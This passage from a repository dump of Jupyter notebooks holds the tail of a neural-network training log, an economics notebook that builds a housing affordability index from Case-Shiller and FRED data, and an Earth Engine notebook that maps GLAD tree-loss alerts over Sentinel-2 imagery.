"Epoch 0: train loss: 0.7449527382850647\nEpoch 1: train loss: 0.717972457408905\nEpoch 2: train loss: 0.6911874413490295\nEpoch 3: train loss: 0.665411114692688\nEpoch 4: train loss: 0.6416490077972412\nEpoch 5: train loss: 0.6199914813041687\nEpoch 6: train loss: 0.5994950532913208\nEpoch 7: train loss: 0.581000030040741\nEpoch 8: train loss: 0.5656672120094299\nEpoch 9: train loss: 0.5535496473312378\nEpoch 10: train loss: 0.5445176362991333\nEpoch 11: train loss: 0.5373896956443787\nEpoch 12: train loss: 0.5313980579376221\nEpoch 13: train loss: 0.5265540480613708\nEpoch 14: train loss: 0.5214558839797974\nEpoch 15: train loss: 0.5146776437759399\nEpoch 16: train loss: 0.5056299567222595\nEpoch 17: train loss: 0.4951423406600952\nEpoch 18: train loss: 0.4828510582447052\nEpoch 19: train loss: 0.47148430347442627\nEpoch 20: train loss: 0.46113377809524536\nEpoch 21: train loss: 0.4507763683795929\nEpoch 22: train loss: 0.4409792125225067\nEpoch 23: train loss: 0.4321078658103943\nEpoch 24: train loss: 0.42363131046295166\nEpoch 25: train loss: 0.41503894329071045\nEpoch 26: train loss: 0.4069404602050781\nEpoch 27: train loss: 0.39927226305007935\nEpoch 28: train loss: 0.391050785779953\nEpoch 29: train loss: 0.3826886713504791\nEpoch 30: train loss: 0.3748229742050171\nEpoch 31: train loss: 0.3662555515766144\nEpoch 32: train loss: 0.3579075336456299\nEpoch 33: train loss: 0.34931206703186035\nEpoch 34: train loss: 0.340321809053421\nEpoch 35: train loss: 0.33164268732070923\nEpoch 36: train loss: 0.32432985305786133\nEpoch 37: train loss: 0.3166893422603607\nEpoch 38: train loss: 0.3096335232257843\nEpoch 39: train loss: 0.3033097982406616\nEpoch 40: train loss: 0.2972005307674408\nEpoch 41: train loss: 0.2920237183570862\nEpoch 42: train loss: 0.28712186217308044\nEpoch 43: train loss: 0.2826327383518219\nEpoch 44: train loss: 0.27756237983703613\nEpoch 45: train loss: 0.2731952965259552\nEpoch 46: train loss: 0.2689567804336548\nEpoch 47: train loss: 0.26277127861976624\nEpoch 48: train loss: 0.25737234950065613\nEpoch 49: train loss: 0.2513335347175598\nEpoch 50: train loss: 0.24681732058525085\nEpoch 51: train loss: 0.24150577187538147\nEpoch 52: train loss: 0.23562508821487427\nEpoch 53: train loss: 0.2301647812128067\nEpoch 54: train loss: 0.22509264945983887\nEpoch 55: train loss: 0.21931949257850647\nEpoch 56: train loss: 0.21373581886291504\nEpoch 57: train loss: 0.20955143868923187\nEpoch 58: train loss: 0.20397253334522247\nEpoch 59: train loss: 0.19925785064697266\nEpoch 60: train loss: 0.19394251704216003\nEpoch 61: train loss: 0.18940232694149017\nEpoch 62: train loss: 0.18503163754940033\nEpoch 63: train loss: 0.18002866208553314\nEpoch 64: train loss: 0.17488576471805573\nEpoch 65: train loss: 0.17105229198932648\nEpoch 66: train loss: 0.16553591191768646\nEpoch 67: train loss: 0.16138142347335815\nEpoch 68: train loss: 0.1563856303691864\nEpoch 69: train loss: 0.1516110599040985\nEpoch 70: train loss: 0.1477835774421692\nEpoch 71: train loss: 0.14259018003940582\nEpoch 72: train loss: 0.13912305235862732\nEpoch 73: train loss: 0.1350814402103424\nEpoch 74: train loss: 0.12882369756698608\nEpoch 75: train loss: 0.12629513442516327\nEpoch 76: train loss: 0.1199156790971756\nEpoch 77: train loss: 0.1181848794221878\nEpoch 78: train loss: 0.11417809873819351\nEpoch 79: train loss: 0.10964478552341461\nEpoch 80: train loss: 0.10693181306123734\nEpoch 81: train loss: 0.10265767574310303\nEpoch 82: train loss: 0.10060574114322662\nEpoch 83: train loss: 
0.09585390239953995\nEpoch 84: train loss: 0.09481451660394669\nEpoch 85: train loss: 0.0905645489692688\nEpoch 86: train loss: 0.0892648994922638\nEpoch 87: train loss: 0.08575263619422913\nEpoch 88: train loss: 0.08294343203306198\nEpoch 89: train loss: 0.0813220664858818\nEpoch 90: train loss: 0.07785503566265106\nEpoch 91: train loss: 0.07605229318141937\nEpoch 92: train loss: 0.07349050790071487\nEpoch 93: train loss: 0.07121305167675018\nEpoch 94: train loss: 0.06874813139438629\nEpoch 95: train loss: 0.06714093685150146\nEpoch 96: train loss: 0.06461171805858612\nEpoch 97: train loss: 0.0625307485461235\nEpoch 98: train loss: 0.061237312853336334\nEpoch 99: train loss: 0.058668218553066254\nEpoch 100: train loss: 0.057166531682014465\nEpoch 101: train loss: 0.055316392332315445\nEpoch 102: train loss: 0.05336199700832367\nEpoch 103: train loss: 0.05184140428900719\nEpoch 104: train loss: 0.049787502735853195\nEpoch 105: train loss: 0.04808996990323067\nEpoch 106: train loss: 0.04672490805387497\nEpoch 107: train loss: 0.04459569603204727\nEpoch 108: train loss: 0.04300931096076965\nEpoch 109: train loss: 0.04207373037934303\nEpoch 110: train loss: 0.04056253656744957\nEpoch 111: train loss: 0.03884344547986984\nEpoch 112: train loss: 0.03713357076048851\nEpoch 113: train loss: 0.035995371639728546\nEpoch 114: train loss: 0.03544396907091141\nEpoch 115: train loss: 0.03436385840177536\nEpoch 116: train loss: 0.03259531781077385\nEpoch 117: train loss: 0.031062142923474312\nEpoch 118: train loss: 0.03037857636809349\nEpoch 119: train loss: 0.030567597597837448\nEpoch 120: train loss: 0.029555130749940872\nEpoch 121: train loss: 0.027290351688861847\nEpoch 122: train loss: 0.026530077680945396\nEpoch 123: train loss: 0.026567837223410606\nEpoch 124: train loss: 0.024044036865234375\nEpoch 125: train loss: 0.0235754381865263\nEpoch 126: train loss: 0.023567525669932365\nEpoch 127: train loss: 0.02172396332025528\nEpoch 128: train loss: 0.021219631657004356\nEpoch 129: train loss: 0.02026052214205265\nEpoch 130: train loss: 0.019414860755205154\nEpoch 131: train loss: 0.018849017098546028\nEpoch 132: train loss: 0.017972737550735474\nEpoch 133: train loss: 0.017298642545938492\nEpoch 134: train loss: 0.01709897257387638\nEpoch 135: train loss: 0.016229381784796715\nEpoch 136: train loss: 0.015376945026218891\nEpoch 137: train loss: 0.015010698698461056\nEpoch 138: train loss: 0.014626932330429554\nEpoch 139: train loss: 0.01400137972086668\nEpoch 140: train loss: 0.01346670463681221\nEpoch 141: train loss: 0.013172730803489685\nEpoch 142: train loss: 0.012672406621277332\nEpoch 143: train loss: 0.012325814925134182\nEpoch 144: train loss: 0.011952350847423077\nEpoch 145: train loss: 0.011488349176943302\nEpoch 146: train loss: 0.011197001673281193\nEpoch 147: train loss: 0.010815505869686604\nEpoch 148: train loss: 0.010494096204638481\nEpoch 149: train loss: 0.010101011022925377\n"
],
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset3\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model3.eval()\ny_pred = model3(X_test_third)\ny_pred_third_int = []\n\nfor item in y_pred:\n y_pred_third_int.append(round(float(item[0])))\n \nprint(len(y_pred_third_int))\nprint(len(y_test_third))\ny_test_third = np.array(y_test_third)\nprint(np.sum(y_pred_third_int==y_test_third)/len(y_pred_third_int))",
"32\n32\n0.78125\n"
],
[
"### accuracy on training set\ny_pred = model3(X_train_third)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_third)\nprint(np.sum(y_pred_int==np.array(y_train_third))/len(y_pred_int))",
"[0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n1.0\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2baf8f9249fbe9cb1a7e05d3f2bf2ce2a0d193 | 178,026 | ipynb | Jupyter Notebook | nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | 1 | 2020-04-24T05:29:26.000Z | 2020-04-24T05:29:26.000Z | fecon235-master/nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | null | null | null | fecon235-master/nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | 1 | 2020-04-24T05:34:06.000Z | 2020-04-24T05:34:06.000Z | 208.217544 | 31,548 | 0.898813 | [
[
[
"# Housing economy, home prices and affordibility\n\nAlan Greenspan in 2014 pointed out that there was never a recovery from recession \nwithout improvements in housing construction. Here we examine some relevant data, \nincluding the Case-Shiller series, and derive an insightful \nmeasure of the housing economy, **hscore**, which takes affordibility into account.\n\nContents:\n\n- Housing Starts\n- Constructing a Home Price Index\n- Real home prices\n- Indebtedness for typical home buyer\n- hscore: Housing starts scored by affordability\n- Concluding remarks",
"_____no_output_____"
],
[
"*Dependencies:*\n\n- Repository: https://github.com/rsvp/fecon235\n- Python: matplotlib, pandas\n\n*CHANGE LOG*\n\n 2016-02-08 Fix issue #2 by v4 and p6 updates.\n Our hscore index has been completely revised.\n Another 12 months of additional data.\n 2015-02-10 Code review and revision.\n 2014-09-11 First version.",
"_____no_output_____"
]
],
[
[
"from fecon235.fecon235 import *",
"_____no_output_____"
],
[
"# PREAMBLE-p6.15.1223 :: Settings and system details\nfrom __future__ import absolute_import, print_function\nsystem.specs()\npwd = system.getpwd() # present working directory as variable.\nprint(\" :: $pwd:\", pwd)\n# If a module is modified, automatically reload it:\n%load_ext autoreload\n%autoreload 2\n# Use 0 to disable this feature.\n\n# Notebook DISPLAY options:\n# Represent pandas DataFrames as text; not HTML representation:\nimport pandas as pd\npd.set_option( 'display.notebook_repr_html', False )\n# Beware, for MATH display, use %%latex, NOT the following:\n# from IPython.display import Math\n# from IPython.display import Latex\nfrom IPython.display import HTML # useful for snippets\n# e.g. HTML('<iframe src=http://en.mobile.wikipedia.org/?useformat=mobile width=700 height=350></iframe>')\nfrom IPython.display import Image \n# e.g. Image(filename='holt-winters-equations.png', embed=True) # url= also works\nfrom IPython.display import YouTubeVideo\n# e.g. YouTubeVideo('1j_HxD4iLn8', start='43', width=600, height=400)\nfrom IPython.core import page\nget_ipython().set_hook('show_in_pager', page.as_hook(page.display_page), 0)\n# Or equivalently in config file: \"InteractiveShell.display_page = True\", \n# which will display results in secondary notebook pager frame in a cell.\n\n# Generate PLOTS inside notebook, \"inline\" generates static png:\n%matplotlib inline \n# \"notebook\" argument allows interactive zoom and resize.",
" :: Python 2.7.11\n :: IPython 4.0.0\n :: jupyter 1.0.0\n :: notebook 4.0.6\n :: matplotlib 1.4.3\n :: numpy 1.10.1\n :: pandas 0.17.1\n :: pandas_datareader 0.2.0\n :: Repository: fecon235 v4.16.0123 develop\n :: Timestamp: 2016-02-10, 20:12:07 UTC\n :: $pwd: /media/yaya/virt15h/virt/dbx/Dropbox/ipy/fecon235/nb\n"
]
],
[
[
"## Housing Starts\n\n*Housing starts* is an economic indicator that reflects the number of \nprivately owned new houses (technically housing units) on which \nconstruction has been started in a given period. \nWe retrieve monthly data released by the U.S. Bureau of the Census. ",
"_____no_output_____"
]
],
[
[
"# In thousands of units:\nhs = get( m4housing )\n# m4 indicates monthly frequency.",
"_____no_output_____"
],
[
"# plot( hs )",
"_____no_output_____"
]
],
[
[
"Since housing is what houses people, over the long-term \nit is reasonable to examine **housing starts per capita**.",
"_____no_output_____"
]
],
[
[
"# US population in thousands:\npop = get( m4pop )",
"_____no_output_____"
],
[
"# Factor 100.00 converts operation to float and percentage terms:\nhspop = todf((hs * 100.00) / pop)",
"_____no_output_____"
],
[
"plot( hspop )",
"_____no_output_____"
]
],
[
[
"**At the peaks, about 1% of the *US population got allocated new housing monthly*.\nThe lowest point shown is after the Great Recession at 0.2%.**\n\nClearly there's a downward historical trend, so to discern **short-term housing cycles**,\nwe detrend and normalize hspop.",
"_____no_output_____"
]
],
[
[
"plot(detrendnorm( hspop ))",
" :: regresstime slope = -0.000742599274435\n"
]
],
[
[
"Surprisingly, housing starts per capita during the Great Recession did not\nexceed two standard deviations on the downside. \n\n2015-02-10 and 2016-02-08: It appears that housing starts has recovered relatively\nand is back to mean trend levels.\n\nIn the concluding section, we shall derive another measure of housing activity\nwhich takes affordibility into account.",
"_____no_output_____"
],
[
"## Constructing a Home Price Index\n\nThe correlation between Case-Shiller indexes, 20-city vs 10-city, is practically 1.\nThus a mash-up is warranted to get data extended back to 1987.\nCase-Shiller is not dollar denominated (but rather a chain of changes)\nso we use the median sales prices from 2000 to mid-2014 released by the\nNational Association of Realtors to estimate home price,\nsee function **gethomepx** for explicit details.",
"_____no_output_____"
]
],
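The next cell only inspects **gethomepx** with `??`; as a rough illustration of the splicing idea described above (not the actual fecon235 implementation -- the function name, overlap handling, and the dollar anchor below are illustrative assumptions), two index series could be combined like this:

```python
import pandas as pd

def splice_index(older, newer, anchor_date, anchor_price):
    """Prepend an older index series to a newer one by rescaling the older
    series to agree at the first overlapping date, then convert index points
    to dollars using one known median sales price (anchor_price at anchor_date)."""
    overlap = newer.dropna().index.intersection(older.dropna().index).min()
    scaled_old = older * (newer[overlap] / older[overlap])    # match levels at the seam
    combined = pd.concat([scaled_old.loc[:overlap].iloc[:-1], newer.loc[overlap:]])
    return combined * (anchor_price / combined[anchor_date])  # index points -> dollars

# e.g. homepx_sketch = splice_index(cs10, cs20, '2000-01-31', 240000)  # hypothetical inputs
```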
[
[
"# We can use ? or ?? to extract code info:\ngethomepx??",
"_____no_output_____"
],
[
"# Our interface will not ask the user to enter such messy details...\nhomepx = get( m4homepx )\n# m4 indicates monthly home prices.",
" :: Case-Shiller prepend successfully goes back to 1987.\n"
],
[
"# Case-Shiller is seasonally adjusted:\nplot( homepx )\n# so the plot appears relatively smooth. ",
"_____no_output_____"
],
[
"# Geometric rate of return since 1987:\ngeoret( homepx, 12 )",
"_____no_output_____"
]
],
[
[
"The first element tells us home prices have increased\napproximately 3.7% per annum.\nThe third element shows price volatility of 2.5%\nwhich is very low compared to other asset classes.\n\nBut this does not take into account inflation.\nIn any case, recent home prices are still below\nthe levels just before the Great Recession.",
"_____no_output_____"
],
[
"## Real home prices",
"_____no_output_____"
]
],
[
[
"# This is an synthetic deflator created from four sources:\n# CPI and PCE, both headline and core:\ndefl = get( m4defl )",
"_____no_output_____"
],
[
"# \"Real\" will mean in terms of current dollars:\nhomepxr = todf( homepx * defl )\n# r for real ",
"_____no_output_____"
],
[
"plot( homepxr )",
"_____no_output_____"
],
[
"# Real geometric return of home prices:\ngeoret( homepxr, 12 )",
"_____no_output_____"
]
],
[
[
"*Real* home prices since 1987 have increased at the approximate\nrate of +1.3% per annum.\n\nNote that the above does not account for annual property taxes\nwhich could diminish of real price appreciation.\n\nPerhaps home prices are only increasing because new stock of housing\nhas been declining over the long-term (as shown previously).\n\nThe years 1997-2006 is considered a **housing bubble**\ndue to the widespread availability of *subprime mortgages*\n(cf. NINJA, No Income No Job Applicant, was often not rejected.)\n**Median home prices *doubled* in real terms**: from \\$140,000 to \\$280,000.\n\n**Great Recession took down home prices** (180-280)/280 = **-36% in real terms.**\n\n2015-02-10: we are roughly at 200/280 = 71% of peak home price in real terms.\n\n2016-02-08: we are roughly at 220/280 = 79% of peak home price in real terms.",
"_____no_output_____"
],
[
"## Indebtedness for typical home buyer\n\nFor a sketch, we assume a fixed premium for some long-term mortgages over 10-y Treasuries,\nand then compute the number of hours needed to \npay *only the interest on the full home price* (i.e. no down payment assumed).\n\nThis sketch does not strive for strict veracity, but simply serves as an\nindicator to model the housing economy.",
"_____no_output_____"
]
],
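In symbols (notation ours, not fecon235's), the cells below compute, for month $t$ with median home price $P_t$, 10-year Treasury yield $y_t$ in percent, and average hourly wage $w_t$:

$$\text{mortgage}_t = y_t + 1.5, \qquad \text{interest}_t = P_t \cdot \frac{\text{mortgage}_t}{100}, \qquad \text{payhome}_t = \frac{\text{interest}_t / w_t}{2000},$$

so $\text{payhome}_t$ is the share of a 2000-hour work year needed just to service the interest.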
[
[
"mortpremium = 1.50",
"_____no_output_____"
],
[
"mortgage = todf( get(m4bond10) + mortpremium )",
"_____no_output_____"
],
[
"# Yearly interest to be paid off:\ninterest = todf( homepx * (mortgage / 100.00) )",
"_____no_output_____"
],
[
"# Wage is in dollars per hour:\nwage = get( m4wage )",
"_____no_output_____"
],
[
"# Working hours to pay off just the interest:\ninteresthours = todf( interest / wage )",
"_____no_output_____"
],
[
"# Mortgage interest to be paid as portion of ANNUAL income,\n# assuming 2000 working hours per year:\npayhome = todf( interesthours / 2000.00 )\n\n# We ignore tiny portion of mortgage payment made towards reducing principal.\n# And of course, the huge disparity in earned income among the population.",
"_____no_output_____"
],
[
"plot( payhome )",
"_____no_output_____"
]
],
[
[
"If we assume 2000 hours worked per year (40 hours for 50 weeks), we can see that\ninterest payment can potentially take up to 50% of total annual pre-tax income. \n\n2015-02-10: Currently that figure is about 20% so housing should be affordable,\nbut the population is uncertain about the risk on taking on debt.\n(What if unemployment looms in the future?) \n\nProspects of deflation adds to the fear of such risk.\nDebt is best taken on in inflationary environments.\n\nThe housing bubble clearly illustrated that\nhuge *price risk* of the underlying asset could be an important consideration.\n\nThus the renting a home (without any equity stake) may appear preferable over buying a home.",
"_____no_output_____"
]
],
[
[
"# # Forecast payhome for the next 12 months:\n# forecast( payhome, 12 )",
"_____no_output_____"
]
],
[
[
"2016-02-09: Homes should be slightly more affordable: 19% of annual income -- perhaps\ndue to further declining interest rates, or even some\nincrease in wages for the typical American worker.\n\nCaution: although the numbers may indicate increased affordability,\nit has become *far more difficult to obtain mortgage financing due to\nstrict credit requirements*. The pendulum of scrutiny from the NINJA days of the\nsubprime era has swung to the opposite extreme.\nSubprime mortgages were the root cause of the Great Recession.\nThis would require another notebook which studies credit flows\nfrom financial institutions to home buyers.\n\nGreat Recession: There is evidence recently that families shifted to home rentals,\navoiding home ownership which would entail taking on mortgage debt.\nSome home owners experienced negative equity.\nAnd when the debt could not be paid due to wage loss, it seemed reasonable to\nwalk away from their homes, even if that meant damage to their credit worthiness.\n*Housing construction had to compete with a large supply of foreclosed homes on the market.*",
"_____no_output_____"
],
[
"## hscore: Housing starts scored by affordability\n\nThe basic idea here is that housing starts can be weighted by some\nproxy of \"affordability.\"\nAn unsold housing unit cannot be good for a healthy economy.\n\nRecall that our variable *payhome* was constructed as a function of\nhome price, interest rate, and wage income -- to solve for the portion\nof annual income needed to pay off a home purchase -- i.e. indebtedness.\n\n**Home affordability** can thus be *abstractly* represented as 0 < (1-payhome) < 1,\nby ignoring living expenses of the home buyer.",
"_____no_output_____"
]
],
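Putting the pieces together (again, symbols are ours), the cells below compute

$$\text{hscore}_t = \underbrace{100 \cdot \frac{\text{starts}_t}{\text{pop}_t}}_{\text{hspop}_t} \times \left(1 - \text{payhome}_t\right),$$

which shrinks toward zero either when few housing units are started or when mortgage interest absorbs most of a year's wages.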
[
[
"afford = todf( 1 - payhome )",
"_____no_output_____"
],
[
"# hspop can be interpreted as the percentage of the population allocated new housing.\n\n# Let's weight hspop by afford to score housing starts...\nhscore = todf( hspop * afford )\n\n# ... loosely interpretated as new \"affordable\" housing relative to population.",
"_____no_output_____"
],
[
"plot( hscore )",
"_____no_output_____"
],
[
"stat( hscore )",
" Y\ncount 347.000000\nmean 0.313257\nstd 0.091287\nmin 0.124288\n25% 0.244456\n50% 0.316766\n75% 0.387574\nmax 0.483924\n"
]
],
[
[
"**hscore** can be roughly interpreted as \"affordable\" housing starts\nexpressed as percentage of the total U.S. population.\n\nThe overall mean of *hscore* is approximately 0.31, and we observe a band between\n0.31 and 0.47 from 1993 to 2004.\nThat band could be interpreted as an equilibrium region for the housing economy\n(before the Housing Bubble and Great Recession).\nIt's also worth noting that long-term interest rates during that epoch was\ndetermined by the market -- yet untouched by the massive *quantitative easing*\nprograms initiated by the Federal Reserve.",
"_____no_output_____"
]
],
[
[
"# Forecast for hscore, 12-months ahead:\nforecast( hscore, 12 )",
"_____no_output_____"
]
],
[
[
"## Concluding remarks\n\nWe created an index **hscore** which expresses new \"affordable\" housing units\nas percentage of total population. Affordability was crudely modeled by a few\nwell-known economic variables, plus our extended Case-Schiller index\nof median home prices.\n\n- 2016-02-09 Following the Great-Recession lows around 0.13, *hscore* has now reverted to its long-term mean of 0.31, *confirming the recovery*, and is forecasted to slightly increase to 0.33.\n\n\n- The Fed terminated its QE program but has not sold off any of its mortgage securities. That reduces upward pressure on mortgage rates. However, our *hscore* supports the Fed's rate hike decision on 2015-12-16 since it gives evidence that the housing market has recovered midway between the housing bubble and the subprime mortgage crisis.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2bc04094be181a5cc84d94ce57b4f6a39a40dc | 19,456 | ipynb | Jupyter Notebook | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | 1 | 2020-03-20T19:39:34.000Z | 2020-03-20T19:39:34.000Z | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | null | null | null | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | null | null | null | 74.259542 | 10,788 | 0.807566 | [
[
[
"<table class=\"ee-notebook-buttons\" align=\"left\">\n <td><a target=\"_blank\" href=\"https://github.com/giswqs/earthengine-py-notebooks/tree/master/Tutorials/Keiko/glad_alert.ipynb\"><img width=32px src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" /> View source on GitHub</a></td>\n <td><a target=\"_blank\" href=\"https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb\"><img width=26px src=\"https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png\" />Notebook Viewer</a></td>\n <td><a target=\"_blank\" href=\"https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Tutorials/Keiko/glad_alert.ipynb\"><img width=58px src=\"https://mybinder.org/static/images/logo_social.png\" />Run in binder</a></td>\n <td><a target=\"_blank\" href=\"https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" /> Run in Google Colab</a></td>\n</table>",
"_____no_output_____"
],
[
"## Install Earth Engine API\nInstall the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.\nThe following script checks if the geehydro package has been installed. If not, it will install geehydro, which automatically install its dependencies, including earthengine-api and folium.",
"_____no_output_____"
]
],
[
[
"import subprocess\n\ntry:\n import geehydro\nexcept ImportError:\n print('geehydro package not installed. Installing ...')\n subprocess.check_call([\"python\", '-m', 'pip', 'install', 'geehydro'])",
"_____no_output_____"
]
],
[
[
"Import libraries",
"_____no_output_____"
]
],
[
[
"import ee\nimport folium\nimport geehydro",
"_____no_output_____"
]
],
[
[
"Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. ",
"_____no_output_____"
]
],
[
[
"try:\n ee.Initialize()\nexcept Exception as e:\n ee.Authenticate()\n ee.Initialize()",
"_____no_output_____"
]
],
[
[
"## Create an interactive map \nThis step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function. \nThe optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.",
"_____no_output_____"
]
],
[
[
"Map = folium.Map(location=[40, -100], zoom_start=4)\nMap.setOptions('HYBRID')",
"_____no_output_____"
]
],
[
[
"## Add Earth Engine Python script ",
"_____no_output_____"
]
],
[
[
"# Credits to: Keiko Nomura, Senior Analyst, Space Intelligence Ltd\n# Source: https://medium.com/google-earth/10-tips-for-becoming-an-earth-engine-expert-b11aad9e598b\n# GEE JS: https://code.earthengine.google.com/?scriptPath=users%2Fnkeikon%2Fmedium%3Afire_australia \n\ngeometry = ee.Geometry.Polygon(\n [[[153.11338711694282, -28.12778417421283],\n [153.11338711694282, -28.189835226562256],\n [153.18943310693305, -28.189835226562256],\n [153.18943310693305, -28.12778417421283]]])\nMap.centerObject(ee.FeatureCollection(geometry), 14)\n\nimageDec = ee.Image('COPERNICUS/S2_SR/20191202T235239_20191202T235239_T56JNP')\nMap.addLayer(imageDec, {\n 'bands': ['B4', 'B3', 'B2'],\n 'min': 0,\n 'max': 1800\n}, 'True colours (Dec 2019)')\nMap.addLayer(imageDec, {\n 'bands': ['B3', 'B3', 'B3'],\n 'min': 0,\n 'max': 1800\n}, 'grey')\n\n# GLAD Alert (tree loss alert) from the University of Maryland\nUMD = ee.ImageCollection('projects/glad/alert/UpdResult')\nprint(UMD)\n\n# conf19 is 2019 alert 3 means multiple alerts\nASIAalert = ee.Image('projects/glad/alert/UpdResult/01_01_ASIA') \\\n .select(['conf19']).eq(3)\n\n# Turn loss pixels into True colours and increase the green strength ('before' image)\nimageLoss = imageDec.multiply(ASIAalert)\nimageLoss_vis = imageLoss.selfMask().visualize(**{\n 'bands': ['B4', 'B3', 'B2'],\n 'min': 0,\n 'max': 1800\n})\nMap.addLayer(imageLoss_vis, {\n 'gamma': 0.6\n}, '2019 loss alert pixels in True colours')\n\n# It is still hard to see the loss area. You can circle them in red\n# Scale the results in nominal value based on to the dataset's projection to display on the map\n# Reprojecting with a specified scale ensures that pixel area does not change with zoom\nbuffered = ASIAalert.focal_max(50, 'circle', 'meters', 1)\nbufferOnly = ASIAalert.add(buffered).eq(1)\nprj = ASIAalert.projection()\nscale = prj.nominalScale()\nbufferScaled = bufferOnly.selfMask().reproject(prj.atScale(scale))\nMap.addLayer(bufferScaled, {\n 'palette': 'red'\n}, 'highlight the loss alert pixels')\n\n# Create a grey background for mosaic\nnoAlert = imageDec.multiply(ASIAalert.eq(0))\ngrey = noAlert.multiply(bufferScaled.unmask().eq(0))\n\n# Export the image\nimageMosaic = ee.ImageCollection([\n imageLoss_vis.visualize(**{\n 'gamma': 0.6\n }),\n bufferScaled.visualize(**{\n 'palette': 'red'\n }),\n grey.selfMask().visualize(**{\n 'bands': ['B3', 'B3', 'B3'],\n 'min': 0,\n 'max': 1800\n })\n]).mosaic()\n\n#Map.addLayer(imageMosaic, {}, 'export')\n\n# Export.image.toDrive({\n# 'image': imageMosaic,\n# description: 'Alert',\n# 'region': geometry,\n# crs: 'EPSG:3857',\n# 'scale': 10\n# })\n",
"ee.ImageCollection({\n \"type\": \"Invocation\",\n \"arguments\": {\n \"id\": \"projects/glad/alert/UpdResult\"\n },\n \"functionName\": \"ImageCollection.load\"\n})\n"
]
],
[
[
"## Display Earth Engine data layers ",
"_____no_output_____"
]
],
[
[
"Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)\nMap",
